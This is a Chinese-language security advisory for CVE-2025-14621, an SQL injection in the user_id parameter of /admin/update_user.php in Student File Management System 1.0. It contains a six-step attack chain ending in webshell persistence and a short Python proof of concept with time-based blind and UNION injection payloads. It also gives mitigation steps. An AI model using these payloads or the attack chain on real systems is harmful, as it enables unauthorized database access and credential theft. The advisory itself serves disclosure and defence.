CVE-2025-14621 code-projects Student File Management System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14621

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Student File Management System 1.0

漏洞概述

CVE-2025-14621是code-projects开源项目Student File Management System 1.0版本中存在的一处SQL注入漏洞。该漏洞位于管理后台的/admin/update_user.php文件中，由于对user_id参数的用户输入未经充分过滤或参数化处理，直接拼接到SQL查询语句中，导致攻击者可通过构造恶意SQL语句实现数据库注入攻击。由于该漏洞攻击向量为网络路径且无需认证即可利用，攻击者可远程利用该漏洞获取数据库敏感信息，包括用户账号、密码哈希等数据，甚至可能在特定配置下实现系统命令执行或写入webshell。由于该漏洞利用难度低且公开漏洞利用代码（PoC）已存在，建议受影响的用户尽快采取修复措施。

技术细节

该漏洞属于经典的SQL注入漏洞类型，具体位于Student File Management System的/admin/update_user.php文件中的user_id参数。攻击者在调用该接口时，将恶意的SQLpayload作为user_id参数值传递，由于后端代码直接将用户输入拼接入SQL查询语句，数据库引擎将恶意payload作为SQL语句的一部分执行。典型的利用方式包括：使用UNION SELECT语句提取数据库版本、当前用户、数据库名称等基本信息；通过information_schema或MySQL内置表查询获取数据库表结构和字段信息；最终提取管理员账号及密码哈希。由于该接口位于管理后台路径，理论上需要管理员权限才能访问，但在实际部署中可能存在路径泄露或认证绕过风险，导致未授权攻击成为可能。攻击者获取管理员凭证后可进一步渗透至服务器层面。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标站点使用Student File Management System 1.0，并定位到/admin/update_user.php端点

STEP 2

步骤2

漏洞探测：攻击者构造包含SQL注入payload的user_id参数请求，验证注入点存在性

STEP 3

步骤3

数据库枚举：利用UNION注入或布尔盲注技术获取数据库版本、用户名、数据库名等基本信息

STEP 4

步骤4

数据提取：通过SQL注入查询information_schema或直接枚举表结构，提取用户表中的账号密码哈希

STEP 5

步骤5

权限提升：使用获取的管理员凭证登录后台，寻找文件上传等高危功能实现服务器端命令执行

STEP 6

步骤6

持久化控制：写入webshell或在服务器上建立后门，维持长期访问权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14621 SQL Injection PoC
# Target: Student File Management System 1.0
# Endpoint: /admin/update_user.php
# Parameter: user_id

target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'

# Blind SQL Injection payload to extract database version
payload = "1' AND (SELECT 1 FROM (SELECT SLEEP(5))x)-- "

params = {
    'user_id': payload
}

print(f'[+] Targeting: {target_url}')
print(f'[+] Testing SQL Injection on /admin/update_user.php')

try:
    response = requests.get(f'{target_url}/admin/update_user.php', params=params, timeout=10)
    if response.elapsed.total_seconds() >= 5:
        print('[+] SQL Injection Confirmed! Time-based blind injection works.')
    else:
        print('[-] No obvious injection detected.')
except requests.exceptions.RequestException as e:
    print(f'[-] Request failed: {e}')

# UNION-based injection payload for data extraction
union_payload = "1' UNION SELECT NULL,NULL,user(),database(),version(),NULL-- "
params_union = {'user_id': union_payload}
print(f'[+] Testing UNION injection: {union_payload}')

影响范围

code-projects Student File Management System 1.0

防御指南

临时缓解措施

在官方修复方案发布之前，可采取以下临时缓解措施：1）在前端反向代理层配置URL过滤规则，拦截包含SQL特殊字符（如单引号、UNION、SELECT等关键字）的请求；2）限制/admin路径的访问来源IP，仅允许内网或可信IP段访问管理后台；3）启用数据库访问日志实时监控，发现异常SQL查询立即告警；4）临时关闭update_user.php功能或设置IP白名单访问控制。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14621
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14621
3 Details https://www.cvedetails.com/cve/CVE-2025-14621/
4 VulDB https://vuldb.com/cve/CVE-2025-14621
5 Link https://code-projects.org/
6 Link https://github.com/jjjjj-zr/jjjjjzr4/issues/1
7 Link https://vuldb.com/?ctiid.336306
8 Link https://vuldb.com/?id.336306
9 Link https://vuldb.com/?submit.707132